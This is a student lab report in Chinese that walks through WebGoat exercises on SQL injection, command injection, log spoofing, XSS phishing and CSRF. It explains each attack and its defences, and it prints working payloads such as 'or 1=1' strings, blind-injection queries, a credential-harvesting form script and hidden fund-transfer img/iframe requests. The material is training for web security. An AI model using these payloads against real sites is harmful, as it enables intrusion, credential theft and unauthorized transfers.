2019-2020-2 网络对抗技术 20175209 Exp9 Web安全基础

2019-2020-2 网络对抗技术 20175209 Exp9 Web安全基础

一、实验原理与目的

1. 实验要求

本实践的目标理解常用网络攻击技术的基本原理，做不少于7个题目，共3.5分。包括(SQL,XSS,CSRF)。Webgoat实践下相关实验。

2. 基础问题回答

• SQL注入攻击原理，如何防御

  • 原理：

    • SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。
    • Web应用对后台数据库查询语句处理存在的安全漏洞。即为：在输入字符串中嵌入SQL指令，在设计程序中忽略对可能构成攻击的特殊字符串的检查，例如：',--,# 这些特殊字符
    • 后台数据库将其认作正常SQL指令后正常执行，可能实现对后台数据库进行各种操作，甚至造成破坏后台数据库等严重后果。

  • 防御：

    • 使用正则表达式过滤传入的参数。
    • 关闭或删除不必要的交互式提交表单页面；
    • jsp中调用函数检查是否包函非法字符，做好规范的校验工作，比如搜索框不能输入非法字符、限制输入的长度等。
    • 使用prepared statements语句绑定变量来执行SQL字符串。没有使用prepared statements语句绑定变量可能很容易受到攻击。
• XSS攻击的原理，如何防御

  • 原理：

    • XSS:跨站脚本。攻击者利用网站漏洞（通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤），输入可以显示在页面上的、对其他用户造成影响的HTML代码；从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
    • 攻击者通过在目标网站上注入恶意脚本，使之在用户的浏览器上运行。利用这些恶意脚本，攻击者可获取用户的敏感信息如 Cookie、SessionID 等，进而危害数据安全。

  • 防御：

    • 特征匹配方式，在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击，采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索，一旦发现提交信息中包含“javascript”，就认定为XSS攻击；
    • 对所有用户提交内容进行可靠的输入验证，包括对URL、查询关键字、HTTP头、POST数据等，仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容提交，对其他的一律过滤；
    • 实现Session标记(session tokens)、CAPTCHA系统或者HTTP引用头检查，以防功能被第三方网站所执行。HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此 Cookie；
    • 使用验证码：防止脚本冒充用户提交危险操作。
• CSRF攻击原理，如何防御

  • 原理：

    • CSRF ：跨站请求伪造。即冒名登录。跨站请求伪造的核心本质是窃取用户的Session,或者说Cookie,因为目前主流情况Session都是存在Cookie中.攻击者并不关心被害者具体帐号和密码,因为一旦用户进行了登录,Session就是用户的唯一凭证,只要攻击者能够得到Session,就可以伪装成被害者进入服务器；
    • 主要是当访问网站A时输入用户名和密码，在通过验证后，网站A产生Cookie信息并返回，此时登录网站A成功，可正常发送请求到网站A。在未退出网站A前，若访问另一个网站B，网站B可返回一些攻击性代码并请求访问网站A；因此在网站B的请求下，向网站A发出请求。但网站A不知道该请求恶意的，因此还是会执行该恶意代码防御。

  • 防御：

    • 验证请求中的Token，每一个网页包含一个web server产生的token, 提交时，也将该token提交到服务器，服务器进行判断，如果token不对，就判定位CSRF攻击。将敏感操作又get改为post,然后在表单中使用token. 尽量使用post也有利于防御CSRF攻击。
    • 验证 Referer，因为伪造的请求一般是从第三方网站发起的，所以第一个防御方法就是判断 referer 头，如果不是来自本网站的请求，就判定为CSRF攻击。但是该方法只能防御跨站的csrf攻击，不能防御同站的csrf攻击(虽然同站的csrf更难)。
    • 添加加随机验证，每一个重要的post提交页面，使用一个验证码，因为第三方网站是无法获得验证码的。还有使用手机验证码，比如转账是使用的手机验证码。

二、实验过程

1. 环境配置

WebGoat

WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台，用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上，目前提供的训练课程有很多，包含了XSS、线程安全、SQL注入、访问控制、隐藏字段、Cookie等。

• webGoat需要Java SE8的支持，版本不匹配那么浏览器的菜单栏中会缺失很多内容

• 在官网下载jdk-8u251-linux-x64.tar.gz ,并参考链接进行环境配置，配置好截图如下：
  

• 在https://www.jianshu.com/p/9ec7838411c8下载webgoat-container-7.0.1-war-exec.jar ，移动到kali中(相关资源已上传百度云盘，链接 提取码：agfd)

• 在命令行输入 java -jar webgoat-container-7.0.1-war-exec.jar运行Webgoat ，等待一小会后出现如下提示则运行成功。
  

• 在浏览器中输入http://localhost:8080/WebGoat 进入WebGoat登录界面
  

• 使用页面下端任意一个账号密码进行登录，可以看到如下页面：
  

2. SQL注入攻击（Injection Flaws）

命令注入（Command Injection）

• 概念：命令注入攻击对任何一个以参数驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法，简单易学，能造成大范围的损害，危及系统安全。尽管这类风险数目令人难以置信，互联网中的系统很容易受到这种形式的攻击。
• 原理：在正常的参数提交过程中添加恶意代码以执行某条指令。
• 目标：可以在目标主机上执行任何系统命令
• 过程：

  • 在菜单栏中选择Injection Flaws，展开页面中选择Command Injection

  • 右键点击页面，选择inspect Element 审查网页元素对源代码进行修改,在复选框中对应位置第一个option的代码，双击进行修改，添加"& netstat -an & ipconfig"
    

  • 点击view ，可以看到执行指令后的网络端口使用情况和IP地址。
    

数字型注入（Numeric SQL Injection）

• 概念：注入数字型数据（如：永真式）达到注入的效果。
• 原理：在station字段中注入特征字符，组合成新的SQL语句。如：SELECT * FROM weather_data WHERE station = [station]
• 目标：该例子通过注入SQL字符串查看所有的天气数据。
• 步骤：

  • 在菜单栏中选择Injection Flaws，展开页面中选择Numeric SQL Injection

  • 右键点击页面，选择inspect Element 审查网页元素对源代码进行修改，在选中的城市编号Value值中添加or 1=1
    

  • 点击Go! 即可显示所有城市的天气情况。
    

日志欺骗（Log Spoofing）

• 概念：通过在日志文件中插入脚本实现欺骗。
• 原理：在日志文件中愚弄人的眼睛，攻击者可以利用这种方式清除他们在日志中的痕迹
• 目标：灰色区域代表在 Web 服务器的日志中的记录的内容，目的是使用户名为“admin”的用户在日志中显示“成功登录”
• 步骤：

  • 前提：本题目接受用户输入的任何一个用户名，并将其追加到日志文件中。

  • 在菜单栏中选择Injection Flaws，展开页面中选择Log Spoofing

  • 利用入回车（0D%）和换行符（%0A），在 username 中填入 wangzihong%0d%0aLogin Succeeded for username: admin ，
    

  • 攻击者可以利用这种方式向日志文件中添加恶意脚本，脚本的返回信息管理员能够通过浏览器看到。比如，将admin <script>alert(document.cookie)</script> 作为用户名输入，可以看到弹窗的cookie信息。

SQL注入（LAB: SQL Injection）

字符串型注入（String SQL Injection）

• 原理：通过注入字符串绕过认证
• 目标：以某一身份进行登录，获得全部成员信息。
• 步骤：

  • 在菜单栏中选择Injection Flaws，展开页面中选择LAB: SQL Injection，展开页面中选择String SQL Injection

  • 右键点击页面，选择inspect Element 审查网页元素对源代码进行修改，将password密码框的最大长度限制改为18。
    

  • 以用户Neville（admit）登录，输入密码hello' or '1' = '1

  • 可以进行欺骗，以最高权限进行登录，获取到所有人员列表
    

数字型 SQL 注入（Numeric SQL Injection）

• 原理：通过注入数字型数据绕过认证，
• 目标：可以通过普通员工的账户，查看到BOSS的用户信息。
• 步骤：

  • 在菜单栏中选择Injection Flaws，展开页面中选择LAB: SQL Injection，展开页面中选择Numeric SQL Injection

  • 使用用户名 Larry，密码 larry 登录，点击ViewProfile 查看用户信息
    

  • 右键点击页面，选择inspect Element 审查网页元素源代码，我们可以看到数据库索引的依据是员工ID，推测返回的是每次查询到的第一条数据。

  • 老板应该是工资最高的，所以将员工ID的value改成101 or 1=1 order by salary desc ，使得Boss的信息作为查询到的第一条数据（始终是最高的）。
    

  • 更改后再次点击ViewProfile ，即可查询到最高纪录的结果
    

字符串注入（String SQL Injection）

• 概念：通过注入字符串绕过认证。
• 原理：基于以下查询语句构造自己的 SQL 注入字符串。SELECT * FROM user_data WHERE last_name = '?'
• 目标：尝试通过 SQL 注入将所有信用卡信息 显示出来。尝试的用户名是“Smith”。
• 步骤：

  • 在菜单栏中选择Injection Flaws，展开页面中选择String SQL Injection

  • 正常情况下只能查询到用户名对应的信用卡号码
    

  • 输入查询的用户名Smith' or 1=1-- (1=1是恒等式，因此能查询到表里面的所有数据)

  • 查询到所有用户信用卡号码如下：
    

数据库后门（Database Backdoors）

• 概念：数据库通常作为一个 Web 应用程序的后端来使用。此外，它也用来作为存储的媒介。 它也可以被用来作为存储恶意活动的地方，如触发器。触发器是在数据库管理系统上调用另 一个数据库操作，如 insert, select, update or delete。
• 原理：攻击者可以创建一个触发器， 该触发器在创建新用户时，将每个新用户的 Email 地址设置为攻击者的地址。
• 目标：利用查询的脆弱性创建触发器。由于 WebGoat 使用的是 MySQL 数据库，不支持触发器，所以该课程不会真正完成。 我们的 Login ID 是 101。
• 步骤：

  • 在菜单栏中选择Injection Flaws，展开页面中选择Database Backdoors

  • 输入101，得到该用户的信息。我们可以看到，输入的语句没有验证，很容易进行 SQL 注入
    

  • 输入注入语句101; update employee set salary=18000 执行两个语句
    

  • 输入101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='wangzihong@hackme.com'WHERE userid = NEW.userid (这项操作不会完成，不支持触发器）

    • BEFORE/AFTER 参数指定了触发执行的时间
    • FOR EACH ROW 表示任何一条记录上的操作满足触发事件都会触发该触发器，也就是说触发器的触发频率是针对每一行数据触发一次
      

数字型盲注入（Blind Numeric SQL Injection）

• 原理：某些 SQL 注入是没有明确返回信息的，只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句，构造子查询语。
• 目标：该题目允许输入一个帐号，并检测该帐号是否合法。使用该表单的返回信息（真或假）测试检查数据库中其它条目信息。我们找到 pins 表中 cc_number 字段值为 1111222233334444 的记录中 pin 字段的数值。pin 字段类型为 int，整型。输入找到的数值并提交，通过该题目。
• 步骤：

  • 在菜单栏中选择Injection Flaws，展开页面中选择Blind Numeric SQL Injection

  • 本题目中，服务端页面返回的信息只有两种：帐号有效或无效。如果该查询语句返回了帐号的信息，页面将提示帐号有效，否则提示无效。使用 AND 函数，我们可以添加一些额外的查询条件。如果该查询条件同样为真，则返回结果应提示帐 号有效，否则无效。

  • 例如：输入查询语句101 AND 1=1 ，因为两个条件都成立，所以页面返回帐号有效
    

  • 针对查询语句的后半部分构造复杂语句,如：101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 ) ；如果提示有效，则pin值大于5000，如果无效，则pin值小于5000。
    

  • 使用二分法，最终得出pin的值为2364,输入2364进行验证
    

字符串型盲注入（Blind String SQL Injection）

• 原理：与数字型盲注入类似，某些 SQL 注入是没有明确返回信息的，只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句，构造子查询语。
• 目标：找到 pins 表中 cc_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值（最终的字符串，注意拼写和大写）并提交，通过本题目。
• 步骤：

  • 在菜单栏中选择Injection Flaws，展开页面中选择Blind String SQL Injection

  • 输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'M' ) ；判断第一个字母是不是是否比字母“M”小，同样用二分法确定第一个字母
    
    

  • 接下来依次确认其他字母，其他字母均为小写 ，最终得到结果为Jill
    

XSS攻击(Cross‐Site Scripting)

跨站脚本攻击是通过HTML注入劫持用户的浏览器，任意构造用户当前浏览的HTML内容，可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。

XSS 钓鱼（Phishing with XSS）

• 原理：当用户输入非法HTTP响应时容易受到XSS攻击。在XSS的帮助下，可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。
• 目标：
  创建一个 form，要求填写用户名和密码。将数据提交到

http://localhost/WebGoat/catche r?PROPERTY=yes&user=catchedUserName&password=catchedPasswordNam

• 步骤：

  • 在菜单栏中选择Cross‐Site Scripting，展开页面中选择Phishing with XSS

  • 利用XSS可以在已存在的页面中进一步添加元素，包括两部分：

    • 受害人填写一个表格;
    • 服务器以读取脚本的形式，将收集到的信息发送给攻击者。

  • 编写一段脚本读取被攻击者在表单上输入的用户名和密码信息，将这些信息发送给捕获这些信息的 WebGoat

  • 编写一个带用户名和密码输入框的表格:

//脚本 
</form> 
<script> 
    function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; 
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); 
    } 
</script> 
<form name="phish"> 
<br> 
<br> 
//表格 
<HR> 
    <H2>This feature requires account login:</H2> 
<br> 
    <br>Enter Username:<br> 
    <input type="text" name="user"> 
    <br>Enter Password:<br> 
    <input type="password" name = "pass"> 
<br> 
    <input type="submit" name="login" value="login" onclick="hack()"> 
</form> 
<br> 
<br> 
<HR>

存储型XSS攻击（Stored XSS Attacks）

• 原理：这种攻击常见于论坛等留言平台，用户留言的时候输入一段JavaScript脚本，这段脚本就会被保存在数据库中。因为是留言，所以任何用户在打开网页的时候，这个脚本就会被从数据库中取出来而运行。
• 目标：写入非法的消息内容，可以导致其他用户访问时载入非预期的页面或内容
• 步骤：
  • 在菜单栏中选择Cross‐Site Scripting，展开页面中选择Stored XSS Attacks
  • 在title中任意输入字符，留言板中输入<script>alert("I am 20175209wzh. You've been attacked!!!");</script>
    

反射型XSS攻击（Reflected XSS Attacks）

• 原理：在反射的XSS攻击中，攻击者可以使用攻击脚本创建一个URL，并将其发布到另一个网站、通过电子邮件或其他方式让受害者点击它。
• 目标：使用攻击脚本创建URL，并将其写入网站中，当读取到该URL的时候就会被攻击
• 步骤：
  • 在菜单栏中选择Cross‐Site Scripting，展开页面中选择Reflected XSS Attacks
  • 输入XSS钓鱼中的代码，在上方出现了用户名和密码的对话框，参照钓鱼中的脚本和表格的内容，得到的结果如下：
    

CSRF攻击

跨站请求伪造，尽管听起来像跨站脚本（XSS），但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性。

跨站请求伪造（Cross Site Request Forgery (CSRF)）

• 原理：跨站请求伪造是一种让受害者加载一个包含网页的图片的一种攻击手段。如:<img src="https://www.mybank.com/me?transferFunds=5000&to=123456"/> ,当受害者的浏览器试图呈现此页面时，它将使用指定的参数向www.mybank.com的“me”端点发出请求。浏览器将请求链接以获得图像，即使它实际上是一个资金转移功能。提交请求时，浏览器将添加与站点相关的所有cookie。因此，如果用户对站点进行了身份验证，并且拥有永久或当前会话cookie，那么站点将无法将其与合法的用户请求区分开来。通过这种方式，攻击者可以让受害者执行他们不打算执行的操作，比如“购买物品”，或者脆弱网站提供的任何其他功能。
• 目标：向新闻组发送一封email。这个email包含一个image，其URL指向一个恶意请求。URL应该指向“攻击”servlet，其中包含“屏幕”和“菜单”参数，以及一个额外的参数“transferFunds”，其数值为5000。可以通过在右侧插入的参数中找到“Screen”和“menu”值来构造链接。当经过身份验证的CSRF电子邮件的收件人将被转移他们的资金。
• 步骤：

  • 在菜单栏中选择Cross‐Site Scripting，展开页面中选择Cross Site Request Forgery (CSRF)

  • 查看页面右侧Parameters中的src和menu值，分别为328和900
    

  • 在title中输入任何参数（学号），message框中输入 <img src="http://localhost:8080/WebGoat/attack?Screen=267&menu=900&transferFunds=5000" width="1" height="1" /> ,以图片的的形式将URL放进Message框，这时的URL对其他用户是不可见的(宽高设置成1像素的目的是隐藏该图片)，用户一旦点击图片，就会触发一个CSRF事件，点击Submit提交。

  • 在Message List中生成以Title命名的消息。点击该消息，当前页面就会下载这个消息并显示出来，转走用户的5000元，从而达到CSRF攻击的目的。
    

绕过 CSRF 确认（ CSRF Prompt By‐Pass）

• 原理：跨站点请求伪造(CSRF/XSRF)是一种攻击，它欺骗受害者加载包含“伪造请求”的页面，以便使用受害者的凭据执行命令。提示用户确认或取消命令可能听起来像一个解决方案，但如果提示符是可编写脚本的，则可以忽略它。本课展示如何通过发出另一个伪造的请求来绕过这样的提示符。这也适用于一系列提示，例如向导或发出多个不相关的伪造请求。
• 目标：与上一个题目类似，向包含多个恶意请求的新闻组发送电子邮件:第一个请求用于转移资金，第二个请求用于确认第一个请求触发的提示符。url应该指向攻击servlet，其中包含这个CSRF-prompt-by-pass课程的屏幕、菜单参数和一个额外的参数“transferFunds”，其中包含一个数值“5000”来启动传输，一个字符串值“CONFIRM”来完成传输。您可以从右边的插图中复制课程的参数，创建格式为attack?Screen=XXX&menu=YYY&transferFunds=ZZZ的url 。无论谁收到这封电子邮件，并且碰巧在那个时候通过了身份验证，他的资金就会被转移。
• 步骤：
  • 在菜单栏中选择Cross‐Site Scripting，展开页面中选择CSRF Prompt By‐Pass
  • 在title框中输入学号，message框中输入代码：
  • 在Message List中生成以Title命名的链接，点击进入后，攻击成功,可以从左侧的任务栏看到任务已完成。

<iframe src="attack?Screen=328&menu=900&transferFunds=5000"> </iframe> 
<iframe src="attack?Screen=328&menu=900&transferFunds=CONFIRM"> </iframe>

三、实验中遇到的问题

Question

       实验中遇到的问题就是Webgoat菜单栏不全的问题，原因就是jdk的版本不匹配，在前面已经有过阐述

四、实验心得体会

       本次实验的内容主要是和攻击相关的内容。实验过程很顺利，没有出现什么问题。通过这次实验也让我了解了很多攻击的过程和攻击能够成功的原因，对于防范这些攻击也有了一些认识和理解。
       这门课程的实验已经全部完成了，其实最后一个实验才是我最顺利，用时最短的实验。其他实验都会出现形形色色的问题，有的甚至花了几天的时间去解决问题。通过这些实验我对网络的攻防对抗有了质的理解和实践，觉得收获非常大，之后有机会也会继续磨练这方面的内容。